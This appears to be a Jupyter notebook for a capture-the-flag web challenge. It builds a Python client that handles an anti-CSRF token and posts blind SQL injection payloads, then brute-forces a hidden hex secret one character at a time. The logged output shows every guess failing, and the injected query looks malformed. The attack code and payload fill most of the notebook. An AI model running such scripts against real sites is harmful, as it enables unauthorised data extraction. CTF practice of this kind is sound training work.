# Blind injection expample

Object to call the server to perform a blind injection attack.

In [27]:
import requests
import binascii
import time


class Inj:
    def __init__(self, host):

        self.sess = requests.Session() # Start the session. We want to save the cookies
        self.base_url = '{}/api/'.format(host)
        self._refresh_csrf_token() # Refresh the ANTI-CSRF token

    def _refresh_csrf_token(self):
        resp = self.sess.get(self.base_url + 'get_token')
        resp = resp.json()
        self.token = resp['token']

    def _do_raw_req(self, url, query):
        headers = {'X-CSRFToken': self.token}
        data = {'query': query }
        return self.sess.post(url,json=data, headers=headers).json()

    def logic(self, query):
        url = self.base_url + 'logic'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

    def union(self, query):
        url = self.base_url + 'union'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

    def blind(self, query):
        url = self.base_url + 'blind'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

    def time(self, query):
        url = self.base_url + 'time'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

Broute force the solution letter by letter

In [28]:

# ... snippet di definizione della classe Inj

inj = Inj('http://web-17.challs.olicyber.it/')

dictionary = '0123456789abcdef'
result = ''

while True:
    for c in dictionary:
        question = f"1' AND (SELECT 1 FROM SELECT * WHERE HEX(asecret) LIKE '{result+c}%')='1"
        response, error = inj.blind(question)
        print(f"Trying {result+c}: {response}")
        if response == 'Success': # We have a match!
            result += c
            break
    else:
        break # Yup, i cicli for in Python hanno una sezione else.
              # Significa che abbiamo esaurito i caratteri del
              # dizionario.

result

Trying 0: Failure
Trying 1: Failure
Trying 2: Failure
Trying 3: Failure
Trying 4: Failure
Trying 5: Failure
Trying 6: Failure
Trying 7: Failure
Trying 8: Failure
Trying 9: Failure
Trying a: Failure
Trying b: Failure
Trying c: Failure
Trying d: Failure
Trying e: Failure
Trying f: Failure


''